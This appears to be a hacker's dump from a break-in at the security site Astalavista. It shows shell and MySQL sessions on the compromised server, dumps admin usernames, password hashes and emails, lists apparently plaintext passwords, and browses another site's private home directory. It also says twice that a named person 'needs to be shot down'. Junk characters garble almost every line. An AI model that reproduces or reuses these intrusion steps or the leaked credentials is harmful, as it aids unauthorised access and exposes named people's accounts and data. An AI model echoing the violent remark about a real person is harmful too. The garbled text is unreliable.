<description>All availably Exploits.</description>
' m* T, E4 Z: C0 u4 p9 U7 r& i <language>en-us</language>
* o( c; S* T9 ` l% ~- Y+ M7 ` <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>* d5 @2 U0 Y e% z1 e
<docs>http://blogs.law.harvard.edu/tech/rss</docs>. L. s! I+ l# r. O/ z3 ~
<generator>Astalavista.com</generator> a q3 {" J* V4 ^* Y4 l
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘) p0 L$ M9 @0 `) |% i& Z7 z
</channel>/ O, b6 }& w9 a4 M9 c: T* u5 t
</rss>’;' o) H1 h7 a8 I8 E8 i, @% ^$ K
@+ I; W/ B( | if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {1 C* C/ w1 G& {! W
unlink (FULLPATH . ‘/feed/exploits.xml’);+ t' m9 y( u+ t0 s: @: Q
}
% A. B& B5 x' V Y
9 L/ n4 p6 B; J T- u: E file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);6 H8 `- q+ C) A% q- d$ M6 G- J- k) }
[snip]
0 x+ t+ M6 r9 ?4 k) d6 i- V/ ]( W m5 J) \
sh-3.2$ cat exploits.sh/ V! O E* s- d& F( {( Y
#!/bin/sh* j' R5 o" G" Q0 t) }: E
- i$ T6 ~$ K$ R###########################################################
9 k; f, V( E; m# #
7 c* Z- J8 ~4 F( M) S# Title: milw0rm exploits adder #
8 k" S* P: s4 D$ e9 W8 K# Description: Add all milw0rm exploits to the #
4 z7 N1 ?. `' g1 y# F3 R# Astalavista.com database #
/ J ~" ]. {- f( a6 k8 A/ ^# #8 B: ~9 {& K2 v3 C5 F) V
# Company: Astalavista Group #
z# G" M9 z% V. _& t3 D) s# Author: Paulo M. Santos #
4 |1 Q$ e! y! U; C* @3 W( ~% N# E-Mail: 链接标记paulo.santos@astalavista.ch #. J9 ~6 z m1 q3 a, N4 Y: U6 I
# #: Q, n9 }' N& [5 A. j
###########################################################
( H+ m3 o. H! T1 e8 i3 T. N M. ^, |# Y; K: _
# path2 J1 o% g" h; U$ K8 w
this_path=/home/com/public_html/modifications/cronjobs+ c, Z* l1 a* q5 u, U
: m! }8 Y3 @* O& p( p8 b1 t$ L: S# change directory( \7 k& f9 d. k: E9 M: u& p
cd $this_path: M4 F, g8 {+ E8 _, r
cd tmp/
4 |/ Y% f; A: e$ p6 M- p% S( V3 h+ l
8 w5 P1 e3 ]7 v6 v+ B# delete files
' y0 x1 @. \; F% r5 trm -rf milw0rm.tar.* &
* S5 @9 d4 W3 J6 i. ~# |8 Trm -rf milw0rm/ &
! h0 M- N! Z- T: ^7 o: k* I. u- u! Q* w. G; _7 q1 f
# wget milw0rm paket
) n# y, B- W8 J- V# ^ A" t2 M$ O$ }6 gwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]" N6 `+ u7 b1 ]0 O# ?' i/ n
L# z* u n3 k# P: ^+ A+ l6 x @
# extract milw0rm paket8 v- y) i+ X) Z
tar -xvf milw0rm.tar.bz2* `& _& ~" L x0 B
5 }2 W6 g% m! N |& P0 t# change owner
8 \/ `# u0 O7 U$ Y$ `; h9 Rchown -R com .7 z g0 N! A6 B! a; t
chgrp -R com .
- O5 P/ n4 A* o7 o' C- r5 W/ I
# z" C9 c: F6 [$ |# execute php script; k' D5 y9 q4 p/ j# q: O, Z
cd $this_path
5 w c* G# D7 S0 g- _: @. e2 s, Yphp -q exploits.php7 ?5 x5 Q% p$ W8 p
2 b2 i! V. m" _1 @0 F
# delete files
! ^/ b( s# k1 m0 ?! u& T# P' Urm -rf tmp/milw0rm.tar.*0 E7 b* C7 [8 h5 v/ M; ~1 _
rm -rf tmp/milw0rm/0 ~/ `1 _( g ~" r3 [
7 J4 p8 D, B+ Y2 f/ C# x
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
/ k. f7 R2 Z. |% uPaulo M. Santos needs to be shot down.8 a. C7 A0 @/ V1 K/ R# F* \! ]
, O! v3 J2 m1 o% N' Smysql -u contrexxuser2 -p
. k! I6 u' q( ]" B( P# YEnter password:
2 C2 I1 v- H4 P5 C0 g( D% YWelcome to the MySQL monitor. Commands end with ; or \g.
+ F' \: L( m/ z0 b5 a; qYour MySQL connection id is 261694
* e, K5 v0 @3 n, w8 uServer version: 5.0.45-community-log MySQL Community Edition (GPL)
4 P' W5 x' ?4 v2 g. F
9 n H& B0 z& p4 q/ E+ ~! VType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.) L( J; O* o" A- B
3 Z8 U! D0 {9 }! l, \5 k
mysql> show databases;
u5 v% M0 M3 a0 X+ X* t+——————–+
) G- _" h$ y m2 Z4 r5 j| Database |
# U- D6 b7 N" p' G+——————–+
/ H$ V1 }; u7 X/ y6 {| information_schema |
$ b+ R5 I% k7 i6 O0 p| com_contrexx2 |
8 d/ P( R. d# j+ o0 D/ F| com_contrexx2_live |
/ Z4 F3 v8 i# w8 ]| test |# S' S) e, a. m2 h
+——————–+
+ @* G: m2 z: s& m: t S4 rows in set (0.00 sec): r) q/ z0 r8 J; l
5 D5 D; k8 n9 Bmysql> use com_contrexx2_live
! X! F+ `* \/ Z, ]Database changed
1 P0 d; i) |/ N# X( s I emysql> show tables;
$ {- j, {5 m+ U8 o- @( c+————————————————–+) u& X2 l. w" k4 a! h: X
| Tables_in_com_contrexx2_live |0 J7 H: ]: ~2 S) ~$ F3 l
+————————————————–+
; k: p1 j$ Z0 E3 I9 A0 h$ q1 u| cc_banner_counter |
@3 X3 w0 O8 m1 G| cc_search_counter |
: N+ u* X( U8 X7 M* L| contrexx_access_group_dynamic_ids |
* n' H4 B" m3 `1 ]+ G5 d2 y| contrexx_access_group_static_ids |; Z5 R6 a# u( O! d
| contrexx_access_rel_user_group |
: [. z' u1 K: X4 x+ ~8 z8 x| contrexx_access_settings |5 P; m W4 {# S9 S6 N
| contrexx_access_user_attribute |- ?% B h! I& L8 ]
| contrexx_access_user_attribute_name |
' C% W$ v; R6 y| contrexx_access_user_attribute_value |2 Q5 ]" ]3 t- Y7 n* _6 r+ Z
| contrexx_access_user_core_attribute |
* g8 X) R" Z2 O( u" C8 c| contrexx_access_user_groups |2 g* Z& J3 N- O5 q
| contrexx_access_user_mail |- [# x) X+ Q0 S! f4 S" a, x( ~0 i% g
| contrexx_access_user_profile |
" P& [, R, Y2 @5 J8 X| contrexx_access_user_title |* f: t' B$ ~( t
| contrexx_access_user_validity |# b6 T, g: m' h! @, u
| contrexx_access_users |
/ B' @3 G, C* Y- Z9 T4 e, j| contrexx_backend_areas |) T8 o7 }! {' ~2 u% `
| contrexx_backups |! K+ z. \& r) k; W
| contrexx_content |7 s# Z+ K4 O* v4 {0 C0 J
| contrexx_content_history |/ N) z+ H6 Z% @2 O" y9 P: H3 {
| contrexx_content_logfile |, |6 l# w( ] R+ i6 ~
| contrexx_content_navigation |3 s1 f. N2 ^4 _
| contrexx_content_navigation_history | L# z7 o! w; [, O% _
| contrexx_ids |" H K: F+ X! f0 m4 E3 b n8 Z
| contrexx_languages |- n' u" s- U) q2 G6 a' \: T
| contrexx_lib_country |. \: l& y1 T% e: ^' x6 e
| contrexx_log |2 m# \0 u. R5 [
| contrexx_module_alias_source |& ]! d' L2 r, V3 J9 x) g
| contrexx_module_alias_target |( m6 _, S9 W9 U3 b, O* @
| contrexx_module_block_blocks |
+ [0 Z8 k0 l* t' T2 }| contrexx_module_block_rel_lang |, o9 F/ Q6 M: V
| contrexx_module_block_rel_pages |. R1 G( i# v( G* [7 L
| contrexx_module_block_settings |
1 `/ G" B9 F. I9 W, h9 ?2 ^+ {| contrexx_module_blog_categories |
& y: o+ v+ ?* h6 ~3 y| contrexx_module_blog_comments |5 x& h: @) j" K8 B. Q
| contrexx_module_blog_message_to_category |
; ]0 C& Q i; D( `2 i| contrexx_module_blog_messages |0 D* U; N5 D* x$ F4 u# A0 J
| contrexx_module_blog_messages_lang |
6 Q& B8 s, M3 h/ U; f6 w% r+ t9 r4 Q| contrexx_module_blog_networks |& P: ~" j& f" i( n
| contrexx_module_blog_networks_lang |
3 D& v2 H. t& _4 Q. k| contrexx_module_blog_settings |
7 @) Y( d* _/ q8 y8 h4 _| contrexx_module_blog_votes |
. a4 g' @: p4 W$ ` K: ~: L8 Z| contrexx_module_calendar |6 m3 R+ D, r; W0 R. j/ Y
| contrexx_module_calendar_access |
- Q6 E8 U* ~4 t8 M* F+ X| contrexx_module_calendar_categories |. e* T+ \, ~! ~ p
| contrexx_module_calendar_form_data |
6 w8 _& b P7 M* D8 L' @% m| contrexx_module_calendar_form_fields |5 ~" K+ Y% y' s: T
| contrexx_module_calendar_registrations |
) w, F' b$ w) V" D/ x2 l- c1 _| contrexx_module_calendar_settings |
7 p' ~0 J: H: R" f1 p3 c ]: i| contrexx_module_calendar_style |
A5 F! _ j9 c/ o# I| contrexx_module_contact_form |# `3 q; \* Z. D, @
| contrexx_module_contact_form_data |0 l8 K& |' F- |; m
| contrexx_module_contact_form_field |
- q. d+ O/ c3 K2 t7 `| contrexx_module_contact_settings |7 H( F9 |# F- q7 B" H0 t& x
| contrexx_module_data_categories |
) Q5 F. y H; H7 J1 p* b| contrexx_module_data_message_to_category |
- d. {/ Y' v+ q2 Q9 A% r- M" H5 R| contrexx_module_data_messages |" a( I- \7 ~+ f
| contrexx_module_data_messages_lang |8 D7 R5 n, R& X7 _" B) z
| contrexx_module_data_placeholders |
, N1 p$ R7 c1 n) h5 g2 v3 z6 u( A# K| contrexx_module_data_settings |
g8 [& s9 e) T- A| contrexx_module_directory_access |1 T5 H- ^2 h* h' S$ i5 y0 {+ K9 U
| contrexx_module_directory_categories |8 U6 n( F! d) x- ?2 \9 y8 K8 T
| contrexx_module_directory_dir |1 _/ s% i8 u9 b% e. d" R$ n' L7 E$ I/ n
| contrexx_module_directory_inputfields |8 s' ]+ O' u8 B8 F2 Q+ Z: o. S
| contrexx_module_directory_levels |
& a! g9 p' } }( R7 e: F| contrexx_module_directory_mail |8 J; { U1 {& L2 A
| contrexx_module_directory_rel_dir_cat |, H: ?; a& `. ]
| contrexx_module_directory_rel_dir_level |" f F# u/ E |& n+ @- m6 S
| contrexx_module_directory_settings |
) Y7 f, G; T3 D( v0 I| contrexx_module_directory_settings_google |
! h2 H" U) H+ ^/ r0 k| contrexx_module_directory_vote |& S7 K6 L6 W! K2 {
| contrexx_module_docsys |! N9 Y8 }" s( d" D* L! }
| contrexx_module_docsys_categories |
/ f& g6 F: y @0 ^| contrexx_module_egov_configuration |
% _) b6 p& Y: p' m& u O) V| contrexx_module_egov_orders |
9 W2 [, u6 H) a% o* A# F8 s| contrexx_module_egov_product_calendar |
3 ^% |, v: R* D2 R| contrexx_module_egov_product_fields |
4 S# ~' F3 M; X| contrexx_module_egov_products |. h, x# c' g5 r" d! y9 A
| contrexx_module_egov_settings |
1 s. F8 o+ H0 t2 F0 V3 P0 l| contrexx_module_exploits |
" I; ~' Q. }; W0 v| contrexx_module_exploits_categories |
* S1 _! X+ M' X1 P4 r, || contrexx_module_feed_category |
; F/ a$ x3 ^' f- J: ^3 b% X| contrexx_module_feed_news |4 h7 |( Y! ^) F7 @2 B8 A' p4 `
| contrexx_module_feed_newsml_association |
4 R+ ?" W7 T% t2 O& l| contrexx_module_feed_newsml_categories |0 B9 Q Q$ ?' E8 \2 {2 p* z
| contrexx_module_feed_newsml_documents |
6 ?* q2 v& E' G7 t1 P! w' o| contrexx_module_feed_newsml_providers |
6 ]2 Y) ]* A/ ^' Y| contrexx_module_forum_access |7 Q3 O" q" K. S A: H9 o; U
| contrexx_module_forum_categories |
7 h3 V* ]1 G# j( n| contrexx_module_forum_categories_lang |
/ K+ a) }1 t, j0 ?| contrexx_module_forum_notification |, s# D) Y9 f7 D2 |: `5 p6 o
| contrexx_module_forum_postings |. A7 v. T2 U3 {$ n
| contrexx_module_forum_rating |" W& d- }# e2 d; n& s0 q9 g5 Q0 l
| contrexx_module_forum_settings |
3 Z, D t9 n! y' C6 ]; W. B I: {| contrexx_module_forum_statistics |
! N# a7 N0 f9 s4 i| contrexx_module_gallery_categories |
& _/ R# a3 D! y+ {0 k7 E2 P| contrexx_module_gallery_comments | G4 [, Z% \; D/ e
| contrexx_module_gallery_language |
8 P4 B0 @+ e8 \ t+ Y- h: Z- @$ L| contrexx_module_gallery_language_pics |7 k+ {0 J7 y1 H9 ^4 v# e" \6 r
| contrexx_module_gallery_pictures |
, u/ K. Q8 Y5 {2 K| contrexx_module_gallery_settings | [/ E& w, `/ ^9 u; q
| contrexx_module_gallery_votes |
* D! f2 [2 @ F% i3 Y| contrexx_module_guestbook |- t+ K+ s0 v! v) U+ `. x
| contrexx_module_guestbook_settings |
) I7 C0 Q% T. L5 q; c' v| contrexx_module_livecam |/ \4 d2 `! v( V ]- q+ D% ~- }
| contrexx_module_livecam_settings |& ?8 {2 B$ P4 ]8 W$ d
| contrexx_module_market |; }& k' G. u# g
| contrexx_module_market_access |
! G+ A- }! O" }+ T8 f9 D| contrexx_module_market_categories |7 f& O- I5 I( J. |! ]
| contrexx_module_market_mail |
; m7 |6 I* g( i" }! Q4 ~! A& B| contrexx_module_market_paypal |9 C4 X ^) ]* X( g8 B4 H0 P: j6 l' k
| contrexx_module_market_settings |
# B$ W5 [& M; z( L| contrexx_module_market_spez_fields |
2 s1 j- U9 f1 o) U9 d" I5 P, j6 e| contrexx_module_mediadir_access |, D+ d, ?2 h2 w! L4 E* a# u# q
| contrexx_module_mediadir_categories |
& C/ `% e+ ^3 j2 x: V: S+ g| contrexx_module_mediadir_comments |
/ B6 }4 F5 n* t9 P# M! u| contrexx_module_mediadir_dir |* k* c. S# V o0 q/ r
| contrexx_module_mediadir_inputfields |
4 O% n; C1 `2 v" c| contrexx_module_mediadir_levels |) \% Q% w4 {: E b, N/ r
| contrexx_module_mediadir_mail |
+ i9 {# o5 w% A! u| contrexx_module_mediadir_rel_dir_cat |5 n. A7 i$ V7 s. b6 g7 t( Y
| contrexx_module_mediadir_rel_dir_level |
) F3 c1 P& P# x| contrexx_module_mediadir_reports |7 k* U! |2 E8 N$ H$ Y. s
| contrexx_module_mediadir_settings |
0 |2 R c( C/ x# m| contrexx_module_mediadir_settings_google |7 W4 m1 s; M; H U
| contrexx_module_mediadir_vote |! Q$ q! `/ t/ a, K6 |
| contrexx_module_memberdir_directories |/ F$ B, X# A7 o* H
| contrexx_module_memberdir_name |
. W8 e9 q/ d/ l6 k| contrexx_module_memberdir_settings |; S5 p* Q# g( x! o. W3 s( ~
| contrexx_module_memberdir_values |- G- g# G2 S3 N) Y! n2 j0 W
| contrexx_module_nettools_allowed_groups |# v8 P$ b2 H) d' i2 z0 {; y
| contrexx_module_nettools_settings |
: z* L6 f$ h/ B' ?; ^| contrexx_module_news |
/ ?7 l* n% o2 N# i; D! }; W| contrexx_module_news_access |
3 t# U% z4 q7 w% H' Q2 _: Z" || contrexx_module_news_categories |3 O! o; m6 N8 ]+ W& @& g1 m
| contrexx_module_news_settings |
6 {( y& J' B; L0 N) B+ M| contrexx_module_news_teaser_frame |
% v0 k! u* Q3 [$ c7 @1 A% i% u6 s| contrexx_module_news_teaser_frame_templates |
* z& n1 Z G. i; P2 W8 Q| contrexx_module_news_ticker |
4 m6 T; J6 T, Y| contrexx_module_newsletter |
/ P0 Y; w. |0 @' I) q| contrexx_module_newsletter_attachment |
; C0 X6 G8 t4 _( H| contrexx_module_newsletter_category |; E$ j2 g( y* Y" D* ^7 Y& s2 X9 T# }
| contrexx_module_newsletter_confirm_mail |. Q( V5 @) _# |0 k$ ]* B
| contrexx_module_newsletter_rel_cat_news |4 q8 x. f: l3 ^' g: i) k9 I1 J
| contrexx_module_newsletter_rel_user_cat |
5 S. d8 p# f" i, T9 A x& H" Q| contrexx_module_newsletter_settings |
7 B( v1 k+ [! A( v$ |3 Z| contrexx_module_newsletter_template |2 M: b$ Q/ z; @! U% d
| contrexx_module_newsletter_tmp_sending |9 A+ i2 u/ x8 @% D& k
| contrexx_module_newsletter_user |$ q4 V/ E# |" o+ y: O4 i5 b6 L
| contrexx_module_newsletter_user_title |
- X1 w& Y) m. Y| contrexx_module_onlinetools_defaultports |: L4 c( w: ^. v' o
| contrexx_module_onlinetools_defaultports_back |
& Y* C3 D0 M$ _& `- H| contrexx_module_onlinetools_geolitecity_blocks |
- A9 L; z! k/ }+ G- B; ?| contrexx_module_onlinetools_geolitecity_country |
6 K: P& \# i: z) D! ]- q$ c! x| contrexx_module_onlinetools_geolitecity_location |
* t+ Q, ~3 Y8 ` S. T| contrexx_module_podcast_category |
9 A" s, d1 o0 x! b| contrexx_module_podcast_medium |& Z+ G" y# _" ]8 \
| contrexx_module_podcast_rel_category_lang |4 b; Q4 s7 s: H% Y
| contrexx_module_podcast_rel_medium_category |
+ @& _) v! ]0 q! d0 Q9 A# F% L6 q6 @| contrexx_module_podcast_settings |. L0 s5 i. i5 o0 d j: ]/ P3 |
| contrexx_module_podcast_template |
* U0 U- `* v( }1 P2 s# K" w9 n/ K| contrexx_module_proxydb |; U( t v4 \- p8 u) _
| contrexx_module_recommend |
7 k- Y2 e9 w/ g8 r4 e) t| contrexx_module_repository |
_9 ]6 D8 g" G2 U3 K M5 m2 G| contrexx_module_securitynews_cats |
: \: z& n* P: R# c| contrexx_module_securitynews_feeds |
1 a+ I" P2 `% U; {* n! K) D| contrexx_module_securitynews_news |
5 U; E: w3 V# e4 B! |0 [1 }| contrexx_module_shop_categories |
( F+ J: a; {+ b- ` T9 a. M| contrexx_module_shop_config |; N0 P5 l/ M1 U+ n4 @( @6 ]* B4 @- T
| contrexx_module_shop_countries |4 z' T" g. [5 C8 T/ T) f5 m
| contrexx_module_shop_currencies |
Z/ @" i: I- v& x8 L J1 I2 y| contrexx_module_shop_customers |
. d6 |0 d5 J# D$ C| contrexx_module_shop_importimg |
) q/ r& r2 O) r8 h; N# ?+ ]: ]| contrexx_module_shop_lsv |) ?7 d. i! D' L3 Y! D& E
| contrexx_module_shop_mail |
( {/ q' K) D* M| contrexx_module_shop_mail_content |
! A* C9 D- z: ]- I# \| contrexx_module_shop_manufacturer |; R4 Y$ ~* o( ^. s, ^4 r
| contrexx_module_shop_order_items |
! }/ V# n$ Q$ E" n1 o| contrexx_module_shop_order_items_attributes |
8 ^: W* L: x7 z| contrexx_module_shop_orders |6 e+ e1 R, S) l5 z! k! O5 t8 S
| contrexx_module_shop_payment |
N- @0 X( P" l1 D: f7 o| contrexx_module_shop_payment_processors |
/ L" C" N# J5 `: S h# {/ d7 u6 t| contrexx_module_shop_pricelists |9 j( Z; r* J9 r1 Y
| contrexx_module_shop_products |: `. n+ G+ ?3 {5 ^* a
| contrexx_module_shop_products_attributes |
$ D W: w* F9 Z1 ]; c/ W1 o) s| contrexx_module_shop_products_attributes_name |
, ~" H( l) g n+ n# R| contrexx_module_shop_products_attributes_value |
' A$ j2 r4 d2 x+ c0 K' D| contrexx_module_shop_products_downloads | T8 Z! ]( d9 J
| contrexx_module_shop_rel_countries |; w9 T: c3 v3 Q# k& ]6 k
| contrexx_module_shop_rel_payment |' V' y+ V) n7 G1 _
| contrexx_module_shop_rel_shipment |
' c( V1 @7 Z4 D7 l, y1 s| contrexx_module_shop_shipment_cost |
; r6 a3 h: S1 e4 a| contrexx_module_shop_shipper |1 R" I3 q5 R$ A4 d% Q
| contrexx_module_shop_vat |
! Q; ~7 g6 }6 o- E) E3 p: z| contrexx_module_shop_zones |
) }; B# n0 S' g9 \1 J$ X3 ?| contrexx_module_u2u_address_list |
# B: i. R3 `' U n| contrexx_module_u2u_message_log |5 C. @. Y! {. K3 T. D. k# u B9 Q8 C
| contrexx_module_u2u_sent_messages |
- c$ |: }! l- c6 `| contrexx_module_u2u_settings |
7 O+ r- |! ~/ J| contrexx_module_u2u_user_log |8 i) z- d8 g3 c+ B7 X3 D2 m
| contrexx_modules |
, q6 O$ I6 l7 f8 H| contrexx_sessions |
; }# D0 U0 g7 s' s/ `0 P| contrexx_settings |
2 B1 b% k- Q' U7 m4 M2 }' m: I| contrexx_settings_smtp |
; k# m0 o0 g2 d9 P# l| contrexx_skins |5 c# F2 b, l5 Q1 I6 C
| contrexx_stats_browser |
! B" \* O8 ?% p# _: y0 u| contrexx_stats_colourdepth |1 f S, H. B0 I& J% {& g& g
| contrexx_stats_config |
1 V, E0 J$ t+ l8 D2 q6 p7 k1 v% ^| contrexx_stats_country |
: V$ {& e( e+ s9 q+ j| contrexx_stats_hostname |/ r) i; U) g Q0 y. m9 ~0 u
| contrexx_stats_javascript |
: W2 n1 F1 @, `; j, T% `| contrexx_stats_operatingsystem |
; {/ x0 K$ X$ c' t| contrexx_stats_referer |
7 z5 N+ h! Z' l: Q- V| contrexx_stats_requests |, c8 x( l" O) h- w* w9 w! p
| contrexx_stats_requests_summary |$ w- F# H/ g8 t+ ~) D- V. K, h. x% M
| contrexx_stats_screenresolution |" h! ]2 Q( t9 V) O
| contrexx_stats_search |" \) M+ d ?4 R: N" t8 X- B1 r
| contrexx_stats_spiders |+ ?6 n/ j* g- z. J- n; R2 a& d
| contrexx_stats_spiders_summary |
5 e- D2 _2 k1 @; x$ M| contrexx_stats_visitors |
8 F! a% T! m8 K' x| contrexx_stats_visitors_summary |- e1 }. j$ F# |, I( D( F
| contrexx_voting_additionaldata |
& I( J( _6 ~% o7 L. H2 E: x3 j| contrexx_voting_email |3 J! |4 v, b' \2 e
| contrexx_voting_rel_email_system |
( Y( j6 [0 e/ {8 A| contrexx_voting_results |
V# `2 |( Q I; [/ D" F9 F, z1 G' M9 o) Q| contrexx_voting_system |
& h a: }* B7 b6 v| foo |
/ _, a. v, G: V( T+————————————————–+
: Z: ~( O6 J2 x" L227 rows in set (0.01 sec)
* r$ ]& s \$ V; O6 }: {# S9 E$ H! B( b) |
mysql> select count(*) as skids from contrexx_access_users;
8 o7 F" L" b3 t+——-+
' d( o5 o) O" W7 f; J1 Z! M2 B0 x| skids |) x- _3 x) D; `% E
+——-+' f% L) n/ l# t; [
| 53699 |7 L0 |0 m/ ?* B8 o- ]% s _
+——-+5 m$ o7 I4 @5 T; U7 g% Y
1 row in set (0.00 sec)
, R) d8 M0 p/ G* o! b* d- K; g/ R* c/ X* [* \
mysql> describe contrexx_access_users;! _9 s: J& G- \
+——————+——————————————+——+—–+————–+—————-+9 W' G- z. M, K0 D0 ^2 ?- o8 Y$ @
| Field | Type | Null | Key | Default | Extra |
+ e& E! F! u" Y+ g3 f* Y% V+——————+——————————————+——+—–+————–+—————-+
+ t3 q6 k' e- E+ ^| id | int(10) unsigned | NO | PRI | NULL | auto_increment |- D/ X4 \0 L$ R4 \0 U
| is_admin | tinyint(1) unsigned | NO | | 0 | |
6 Z& j! i. v& |; O$ a$ ^| username | varchar(40) | YES | MUL | NULL | |
* e6 |4 w+ M5 d& M/ n, P c| password | varchar(32) | YES | | NULL | |$ ^. D( G* p' i' W! w" n) O! P
| regdate | int(14) unsigned | NO | | 0 | |9 }; P! E# I% Z: `5 {
| expiration | int(14) unsigned | NO | | 0 | |
! c2 D0 G8 O, w( D| validity | int(10) unsigned | NO | | 0 | |
- q# G0 `( V+ m. D p| last_auth | int(14) unsigned | NO | | 0 | |
4 i5 ?( C! h3 m* n| last_activity | int(14) unsigned | NO | | 0 | |
! J& T3 w* }2 I| email | varchar(255) | YES | | NULL | |
# _) b- O4 C4 y; C: p, {| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
: k+ u0 g$ `: Q( M8 D& N| frontend_lang_id | int(2) unsigned | NO | | 0 | |
' e/ z# x3 u- v! z| backend_lang_id | int(2) unsigned | NO | | 0 | |
8 w6 e7 B" Q- b% I| active | tinyint(1) | NO | | 0 | |
% g1 }' ^. A7 L& ~! Y9 k| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
- z, j% Z7 u. K- c| restore_key | varchar(32) | NO | | | |
0 l: L% f1 H. p6 _ b% [| restore_key_time | int(14) unsigned | NO | | 0 | |& g; N8 ]2 |/ a. _! d6 d- |
| u2u_active | enum(’0′,’1′) | NO | | 1 | |' ~1 `4 D/ G" S& q- s7 o
+——————+——————————————+——+—–+————–+—————-+) ?+ ] j) H: F
18 rows in set (0.00 sec): M l! } F0 H1 X4 U3 m# K1 T
. K/ @) B' v5 k# V
mysql> select username,password,email from contrexx_access_users where is_admin = 1;1 m4 ?! z( D* c% K, e
+————+———————————-+—————————–+
1 C/ u5 m: _* m) G| username | password | email |2 F. I6 t; m- g d X; \
+————+———————————-+—————————–+
+ P+ P6 N2 P9 Z& r! i8 q. G2 F| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |# y4 p5 p2 q6 W
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |: \: s" e6 o$ |
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
. u+ W" h2 [1 E, H: Q5 A2 e| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
! I3 G* z+ z# v! { V- W+————+———————————-+—————————–+
7 | e; J1 b; q1 f3 r6 m6 s4 rows in set (0.04 sec)) D8 o O, A. t+ [$ Y$ q/ [, |7 c" j7 M
3 c: W* n0 n8 m% O5 L) o; @4 W
mysql> exit;7 u* s3 Q; L8 j' o
Bye
A( q1 W- ?7 F3 M' N- @ k7 N% ?$ q7 Z7 V+ j1 o0 g
[~] There you go, your “team of security and IT professionals” is a joke.- ^5 r7 o- ~6 Y
' }( A1 R6 R3 a+——————————+3 H. M* G! E' g: m- V u
system:f82BN3+_*
( @- a. k" ]' VBe1er0ph0r:belerophor4astacom
7 g, {& E/ `( g+ Cprozac:asta4cms!
3 z! N8 t# M6 [2 `& a& lcommander:mpbdaagf6m) a2 l( D* K; F/ C+ H, x
sykadul:ak29eral# R, }) Y5 K @8 B/ _$ ?( F0 F$ Z
+——————————+% j4 L# Y- w. I5 C0 n3 U% y
5 Q v. }7 c3 b i6 x; [[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)" [8 d. L' o' H1 |5 O# N I9 m% o
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
. V+ ~: r! p8 Y
# y7 d6 p$ ?# n3 N0 x[~] Lets move to astalavista.net now,1 |# i+ `4 c }6 {6 ^" g: G! }4 x
4 B$ S" `1 V( C9 Z" s
From <链接标记[url]https://www.astalavista.net/[/url]>:# I4 e/ v0 V8 d* ]
>> Everyone knows that the best defense is a good offense.8 z' V9 O1 _0 H# y
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
3 a c/ i' X# w. c+ b$ ]>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.. L/ t0 M! ^7 ~ Q) D
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
! J$ X" n1 w1 O, I3 ?% c9 V$ e3 \- ]4 k: y
>> Go ahead, try and hack our server . in a completely legal way!
9 A/ m! k' @& q3 m' M. Q3 V>> Learn by doing: We offer our members tricky tasks and challenges on an
- V: F. ^0 O- ~; U* q4 Y1 J>> ongoing basis so you can test your knowledge and abilities. You can also
% r" R% }( k/ }: |2 o# q>> demonstrate what you.ve mastered by taking part in regular hacker contests6 q) l: c5 i* Y. T7 e, N7 d
>> and war games+ T: M0 Y, U- \+ s
4 l( T( B0 X& s9 i0 |3 x, R* u
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!* `0 |7 k; a7 l) y' W5 j. ?
( U+ Y$ F( ~7 h4 I[-] Tricky task: Find home dir of astalavista.net; m- R5 [1 t4 I/ \! ?" h
- N# v) r) @' C" J* J" e7 r
sh-3.2$ ls -la ~astanet. f# M: X5 {6 K- y, L/ E* [! {
total 481 X/ f: y% i/ A
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
8 P9 O( U9 s' \& \; ?drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ Y, q! C0 e9 @3 R o8 I, o/ Y3 Vdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth u6 D$ X+ {; X5 Z9 R
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history& R3 s: i4 j" `1 K6 z# |% v) o
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout6 S7 B* d, h) x9 `$ Z" c6 ~8 n
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
1 y( K! E' t: S$ R-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
! K/ D5 e; ?0 m5 g5 T) Y' odrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
7 P' g! A2 W4 y8 S9 e+ Q3 sdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
/ i3 I' P) j" d: F3 t* hdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail3 e/ d6 _8 L+ V/ e! X3 W
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
8 T# T! m, ^% W, d! z0 ?-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow7 M7 A, x% e& x) I1 Y" H2 S) W
/ t+ b9 S$ p4 q1 _sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
) G$ y5 B1 ?' W2 psh-3.2$ ls -la
$ G1 S1 B, n' a1 L) q0 Q- }7 itotal 2002 p3 a. [& U& W+ f! V6 D$ S8 z
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
' C9 y2 \/ m% ~$ Q# S% l; sdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
